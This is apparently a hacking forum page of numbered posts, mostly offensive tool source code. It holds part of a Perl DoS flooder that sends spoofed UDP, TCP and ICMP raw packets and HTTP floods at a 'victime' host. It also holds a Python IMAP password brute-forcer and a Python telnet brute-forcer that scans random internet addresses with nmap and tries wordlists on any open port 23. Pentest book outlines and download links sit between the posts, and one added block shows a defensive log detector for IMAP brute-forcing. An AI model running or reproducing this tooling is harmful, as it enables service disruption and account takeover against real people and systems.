'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
'Lynx/2.8.8dev.12 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/2.12.14',
'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-fr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; es-es) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; de-de) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (X11; Linux 3.5.4-1-ARCH i686; es) KHTML/4.9.1 (like Gecko) Konqueror/4.9',
'Mozilla/5.0 (compatible; Konqueror/3.5; SunOS)',
'Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)',
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
'Mozilla/5.0 (X11) KHTML/4.9.1 (like Gecko) Konqueror/4.9)');


my $foke =
"\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30".
"\x48\x6f\x73\x74\x3a\x20\0x687474703a2f2f", pack("H*", $victime).
"\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e​\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x75\x72\x6c\x3f\x73\x61\x3d\x74\x26​\x72\x63\x74\x3d\x6a\x26\x71\x3d\x26\x65\x73\x72\x63\x3d\x73\x26\x73\x6f\x75\x72​\x63\x65\x3d\x77\x65\x62\x26\x63\x64\x3d\x31\x26\x75\x72\x6c\x3d\0x687474703a2f2​f", pack("H*", $victime).
"\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69​\x76\x65";


my $reqq =
"POST / HTTP/1.0\r\n".
"Referer: {foreach (sort {int(rand(1))-1} @referer)}\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Connection: Keep-Alive\r\n".
"User-Agent: {foreach (sort {int(rand(1))-1} @agent)}\r\n".
"Host: $victime\r\n".
"\r\n".
"skype=00000&host=00000&login=00000&password=00000&pseudo=00000&about=00000&test=00000&home=00000&page=00000&pages=00000&info=00000&infos=00000&check=00000&verif=00000&port=00000&time=00000&temps=00000&key=00000&news=00000&submit=00000&msg=00000&message=00000&link=00000&url=00000&[email protected]&[email protected]&show=00000&id=00000\r\n";
















if( $proto eq 'UDP' )


                {
               


print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0




               
                    print color ("red"),"[+]",color("reset"),"Start Flooding .... ";
                    print color ("red"),"[+]",color("reset"),"\n";
                    for (;time() <= $endtime;) {
                                                    my $port_source = int(rand(65534)+1);
                                                    my $ip_source = join ".", map int rand 255, 1 .. 4;
                                                   
                                                    my $sport = int(rand(255));
                                                    $frag = int(rand(2));


                                                    my $packet = new Net::RawIP({
                                                            ip => {
                                                                    saddr => $ip_source,
                                                                    daddr => $victime,
                                                                    frag_off => $frag,
                                                                    },
                                                            udp => {
                                                                    source => $sport,
                                                                    dest => $port,
                                                                    data=> $size,
                                                                    }
                                                                                });


                                                    $packet->send;
     
     
                                                }
       
                }
   


   
 
if( $proto eq 'TCP' ) {
print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0


        print color ("red"),"[+]",color("reset"),"Start Flooding ....";
                    print color ("red"),"[+]",color("reset"),"\n";


    for (;time() <= $endtime;) {


        my( $pktct, $sport, $frag, $urg, $psh, $rst, $fin, $syn, $ack);
        my $port_source = int(rand(65534)+1);
        my $ip_source = join ".", map int rand 255, 1 .. 4;
       


   
        $frag = int(rand(2));
        $urg = int(rand(2));
        $psh = int(rand(2));
        $rst = int(rand(2));
        $fin = int(rand(2));
        $syn = int(rand(2));
        $ack = int(rand(2));
     


        my $packet = new Net::RawIP({
            ip => {
                saddr => $ip_source,
                daddr => $victime,
                frag_off => $frag,
                  },
            tcp => {
                source => $port_source,
                dest => $port,
                urg => $urg,
                psh => $psh,
                rst => $rst,
                fin => $fin,
                syn => $syn,
                ack => $ack,
                data => $size,
                    }
                                    });


        $packet->send;
     
     
                                    }
       
                                }
   
   
   
   
    if( $proto eq 'ICMP' ) {
   
    print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0
    print color ("red"),"[+]",color("reset"),"Start Flooding ....";
                    print color ("red"),"[+]",color("reset"),"\n";
for (;time() <= $endtime;) {


    my($pktct, $code, $type, $frag);
         my $port_source = int(rand(65534)+1);
     my $ip_source = join ".", map int rand 255, 1 .. 4;
   




     $code = int(rand(255));
      $type = int(rand(255));
      $frag = int(rand(2));
     


       my $packet = new Net::RawIP({
         ip => {
            saddr =>$ip_source,
            daddr => $victime,
            frag_off => $frag,
         },
         icmp => {
            code => $code,
            type => $type,
         }
      });


      $packet->send;
     
     
       }
       
   }
   
   
   
   
    if( $proto eq 'HTTP' ) {
    print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0
    print color ("red"),"[+]",color("reset"),"Start Flooding ....";
                    print color ("red"),"[+]",color("reset"),"\n";


for (;time() <= $endtime;) {
       
       
       


$sock = IO::Socket::INET->new(PeerAddr => $victime, PeerPort => 80, Proto => "tcp") or next;
print $sock $reqq;
print $sock $foke;
close($sock);
       }
       
   }
#33

Código: php
CHAPTER 1 Introduction to command shell scripting ................. 1
On Shell Scripting .........................................................................1
What is a shell? ........................................................................2
What is a script? .......................................................................3
Shell scripts...............................................................................3
Where shell scripting is useful .................................................4
UNIX, Linux, and OS X shell scripting .......................................5
Shell availability and choices...................................................5
Working with shells ..................................................................7
Bash basics ....................................................................................8
Hello World ..............................................................................8
Variables..................................................................................10
Arguments...............................................................................10
Control statements ..................................................................11
Putting it all together with bash..................................................15
Adding /dev/tcp/ support to bash ...........................................15
Building a port scanner with bash..........................................16
Improving the script ...............................................................18
Windows scripting .......................................................................18
Shell availability and choices.................................................18
Command.com and CMD.exe ................................................18
PowerShell ..............................................................................19
Cygwin....................................................................................20
Other shells .............................................................................21
PowerShell basics ........................................................................21
Hello World ...........................................................................22
Variables..................................................................................23
Arguments...............................................................................25
Control statements ..................................................................26
Conditionals ............................................................................27
Looping...................................................................................28
Putting it all together with PowerShell.......................................29
Building a port scanner with PowerShell ..............................30
Improving the script ...............................................................32
Summary......................................................................................32
Endnotes ......................................................................................33
v
CHAPTER 2 Introduction to Python ..........................................35
What is Python? ..........................................................................35
Where do we get Python? ......................................................36
Where is Python useful? .............................................................36
Multiplatform scripting...........................................................36
Network scripting ...................................................................36
Extensive modules ..................................................................37
Reusable code that is easy to create ......................................37
Python basics ...............................................................................38
Getting started.........................................................................38
Variables..................................................................................39
Modules...................................................................................40
Arguments...............................................................................41
Lists.........................................................................................44
Dictionaries .............................................................................46
Control statements ..................................................................51
Functions.................................................................................52
File manipulation.........................................................................54
Exception handling .................................................................55
Network communications............................................................57
Client communications ...........................................................57
Server communications ..........................................................59
Scapy.......................................................................................62
Summary......................................................................................68
Endnotes ......................................................................................68
CHAPTER 3 Introduction to Perl ..............................................69
Where Perl is useful ....................................................................69
Handling text ..........................................................................70
Gluing applications together ..................................................70
Working with Perl .......................................................................71
Editing tools............................................................................71
Extending Perl scripts.............................................................72
GUIs in Perl ............................................................................73
Perl basics....................................................................................73
Hello World ............................................................................73
Variables..................................................................................75
Shell commands......................................................................76
Arguments...............................................................................79
Control statements ..................................................................79
Regular expressions ................................................................85
File input and output ..............................................................87
Putting it all together...................................................................91
vi Contents
Building an SNMP scanner with Perl ....................................91
Improving the script ...............................................................97
Summary......................................................................................97
Endnotes ......................................................................................98
CHAPTER 4 Introduction to Ruby.............................................99
Where Ruby is useful..................................................................99
Ruby basics................................................................................100
Variables................................................................................102
Arrays and hashes.................................................................103
Control statements ................................................................106
Functions...............................................................................109
Building classes with Ruby.......................................................112
Building a class ....................................................................112
Extending a class ..................................................................114
Accessing class data .............................................................115
File manipulation
Database basics
Using DBI
Using Active Record
Network operations
Client communications
Server communications
Putting it all together
Summary
Endnotes
CHAPTER 5 Introduction to Web scripting with PHP
Where Web scripting is useful
Getting started with PHP
Scope
PHP basics
Functions
Handling forms with PHP
File handling and command execution
File handling
Command execution
Putting it all together
Summary
CHAPTER 6 Manipulating Windows with PowerShell
Dealing with execution policies in PowerShell
Execution policies
Bypassing the policies
Getting in
Penetration testing uses for PowerShell
Controlling processes and services
Interfacing with the event logs
Getting and sending files over the network
Interfacing with the Registry
PowerShell and Metasploit
PowerShell-oriented Metasploit modules
PowerDump
Windows gather PowerShell environment setting enumeration
Making use of the modules
Summary
Endnotes
CHAPTER 7 Scanner scripting
Working with scanning tools
Netcat
Nmap
Nessus/OpenVAS
Netcat
Implementations of Netcat
Simple Netcat usage
Building a Web server with Netcat
Transferring files with Netcat
Nmap
Working with service probes in Nmap
The Nmap scripting engine
Building Nmap NSE files
Nessus/OpenVAS
NASL in Nessus and OpenVAS
Nessus attack scripting language (NASL)
Summary
Endnotes
CHAPTER 8 Information gathering
Information gathering for penetration testing
Sources of information
Patterns in information
Metadata
What can we do with the information?
Talking to Google
Google hacking
Advanced operators
Automating Google discovery
Web automation with Perl
Pulling information from Web sites
Working with metadata
Finding metadata
Document metadata
Metadata in media files
Putting it all together
Summary
Endnotes
CHAPTER 9 Exploitation scripting
Building exploits with Python
Getting software
Setting up debugging
Causing our first crash
Using pattern_offset
Controlling EIP
Adding shellcode
Getting our shell
Creating Metasploit Exploits
Starting a template
Porting the exploit code
Executing the exploit
Exploiting PHP scripts
Remote File Inclusion
Command execution vulnerabilities
Cross-Site Scripting
What is XSS?
Exploiting XSS
Summary
CHAPTER 10 Post-exploitation scripting
Why post-exploitation is important
Windows shell commands
User management
Gathering network information
Windows network information gathering
Linux network information gathering
Scripting Metasploit Meterpreter
Getting a shell
Building a basic script
Executing the script
Database post-exploitation
What is SQL injection?
MySQL
SQL injection on Microsoft SQL Server
Summary


#34
Introductions and birthdays / Re: Good afternoon!!
July 22, 2017, 10:12:51 AM
Welcome  :)
#35
Python / Python - Imap Brute Src
July 22, 2017, 03:24:40 AM

Code: python
#!/usr/bin/python
#IMAP Brute Forcer


import threading, time, random, sys, imaplib, socket
from imaplib import IMAP4
from copy import copy


if len(sys.argv) !=4:
    print "Usage: ./imapbrute.py <server> <userlist> <wordlist>"
    sys.exit(1)


try:
    users = open(sys.argv[2], "r").readlines()
except(IOError):
    print "Error: Check your userlist path\n"
    sys.exit(1)

try:
    words = open(sys.argv[3], "r").readlines()
except(IOError):
    print "Error: Check your wordlist path\n"
    sys.exit(1)


print "\n\t  imapBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"


# Untouched copy of the wordlist, used to refill it for the next user
wordlist = copy(words)


def reloader():
    for word in wordlist:
        words.append(word)


# Returns a random untried password and the current user; when the
# wordlist is exhausted it is refilled and the next user is selected.
def getword():
    lock = threading.Lock()
    lock.acquire()
    if len(words) != 0:
        value = random.sample(words,  1)
        words.remove(value[0])
    else:
        print "\nReloading Wordlist - Changing User\n"
        reloader()
        value = random.sample(words,  1)
        users.remove(users[0])

    lock.release()
    # [:-1] strips the trailing newline left by readlines()
    if len(users) ==1:
        return value[0][:-1], users[0]
    else:
        return value[0][:-1], users[0][:-1]

class Worker(threading.Thread):

    # One thread per attempt: new connection, a single login, then exit
    def run(self):
        value, user = getword()
        try:
            print "-"*12
            print "User:",user,"Password:",value
            M = imaplib.IMAP4(sys.argv[1])
            M.login(user, value)
            print "\t\nLogin successful:",user, value
            M.close()
            M.logout()
            work.join()
            sys.exit(2)
        except(IMAP4.error, socket.gaierror, socket.error, socket.herror), msg:
            print "An error occurred:", msg
            pass

for i in range(len(words)*len(users)):
    work = Worker()
    work.start()
    time.sleep(1)

The Ethical Hacking is Trash
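
A defender's view of the script above, as an added example that is not part of the original post: each attempt opens a new IMAP connection and tries one password, about once per second, so the server log shows a steady run of single-attempt authentication failures from one source address. The log lines are constructed in the style of Dovecot's imap-login output (an assumed format), and `detect`, its window and its threshold are hypothetical names and values chosen for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in the style of Dovecot imap-login syslog output (assumed format).
FAIL = ("Jul 22 03:24:{s} mail dovecot: imap-login: Disconnected (auth failed, "
        "1 attempts in 0 secs): user=<{u}>, method=PLAIN, rip=203.0.113.7, lip=192.0.2.10")
SAMPLE_LOG = [FAIL.format(s=40 + i, u=u) for i, u in enumerate(["alice"] * 4 + ["bob"] * 3)] + [
    "Jul 22 03:24:47 mail dovecot: imap-login: Login: user=<bob>, method=PLAIN, "
    "rip=203.0.113.7, lip=192.0.2.10",
    "Jul 22 03:25:10 mail dovecot: imap-login: Aborted login (auth failed, 1 attempts "
    "in 3 secs): user=<carol>, method=PLAIN, rip=198.51.100.20, lip=192.0.2.10",
    "Jul 22 03:25:15 mail dovecot: imap-login: Login: user=<carol>, method=PLAIN, "
    "rip=198.51.100.20, lip=192.0.2.10",
]

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dovecot(?:\[\d+\])?: imap-login: "
    r"(?P<event>Login|(?:Disconnected|Aborted login) \(auth failed[^)]*\)): "
    r"user=<(?P<user>[^>]*)>.*?\brip=(?P<rip>[0-9A-Fa-f.:]+)"
)

def parse(lines, year=2017):
    """Yield (timestamp, source_ip, user, success) for each IMAP auth event."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:  # syslog omits the year, so the caller supplies it
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["rip"], m["user"], m["event"] == "Login"

def detect(lines, window=timedelta(seconds=60), threshold=5):
    """Flag source IPs with >= threshold failed logins inside a sliding window."""
    recent = defaultdict(deque)   # source IP -> failure timestamps still inside the window
    targeted = defaultdict(set)   # source IP -> accounts it failed against
    findings = {}
    for ts, rip, user, ok in parse(lines):
        if ok:
            # Success after a guessing burst: treat that password as known to the source.
            if rip in findings and user in targeted[rip]:
                findings[rip]["guessed"].add(user)
            continue
        targeted[rip].add(user)
        q = recent[rip]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            f = findings.setdefault(rip, {"peak": 0, "users": targeted[rip], "guessed": set()})
            f["peak"] = max(f["peak"], len(q))
    return findings
```

On the sample, only 203.0.113.7 is flagged; the single mistyped password from 198.51.100.20 stays below the threshold.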

#36
Python / Telnet Brute Src
July 21, 2017, 03:34:12 PM

Code: python
#!/usr/bin/python
#Uses nmap to check if telnet port is open, brute forces if it is.


import threading, time, StringIO, commands, random, sys, telnetlib, re
from copy import copy


if len(sys.argv) !=4:
    print "Usage: ./telnetbrute.py <how many to scan> <userlist> <wordlist>"
    sys.exit(1)


try:
    users = open(sys.argv[2], "r").readlines()
except(IOError):
    print "Error: Check your userlist path\n"
    sys.exit(1)

try:
    words = open(sys.argv[3], "r").readlines()
except(IOError):
    print "Error: Check your wordlist path\n"
    sys.exit(1)


print "\n\t   d3hydr8[at]gmail[dot]com telnetBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1],"hosts"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"


wordlist = copy(words)


def scan():

    nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -iR 1 -p 23 | grep open -B 3')[1]).readlines()

    for tmp in nmap:
        ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
        if ipaddr:
            return ipaddr


def reloader():
    for word in wordlist:
        words.append(word)


def getword():
    lock = threading.Lock()
    lock.acquire()
    if len(words) != 0:
        value = random.sample(words,  1)
        words.remove(value[0])

    else:
        print "Reloading Wordlist\n"
        reloader()
        value = random.sample(words,  1)

    lock.release()
    return value[0][:-1]

class Workhorse(threading.Thread):

    def run(self):
        value = getword()
        try:
            print "-"*12
            print "User:",user[:-1],"Password:",value
            tn = telnetlib.Telnet(ipaddr[0])
            tn.read_until("login: ")
            tn.write(user[:-1] + "\n")
            if password:
                tn.read_until("Password: ")
                tn.write(value + "\n")
            tn.write("ls\n")
            tn.write("exit\n")
            print tn.read_all()
            print "\t\nLogin successful:",user[:-1], value
            tn.close()
            work.join()
            sys.exit(2)
        except:
            pass


for x in range(int(sys.argv[1])):
    print "Scanning:",x,"of",sys.argv[1]
    ipaddr = scan()
    if ipaddr != None:
        print "\n\tAttempting BruteForce:",ipaddr[0],"\n"
        for user in users:
            for i in range(len(words)):
                if i == 0: reloader()
                work = Workhorse()
                work.start()
                time.sleep(2)
#37
Great contribution, it should be nominated to be on the Blog  :)
#38

Code: php
Preface
1. Installation
2. Introducing MySQL
3. Introducing PHP
4. Publishing MySQL Data on the Web
5. Relational Database Design
6. Structured PHP Programming
7. A Content Management System
8. Content Formatting with Regular Expressions
9. Cookies, Sessions, and Access Control
10. MySQL Administration
11. Advanced SQL Queries
12. Binary Data
A. MySQL Syntax Reference
B. MySQL Functions
C. MySQL Column Types
D. PHP Functions for Working with MySQL
Index


#39
C# - VB.NET / FxTool Src
July 21, 2017, 09:17:02 AM


Download link:
Code: php
https://jumpshare.com/v/TXEqHRkwB9Epyv9wnpns

#40


Download link:
Code: php
https://jumpshare.com/v/D19Dw6HIWsFxBOQ3i8Kk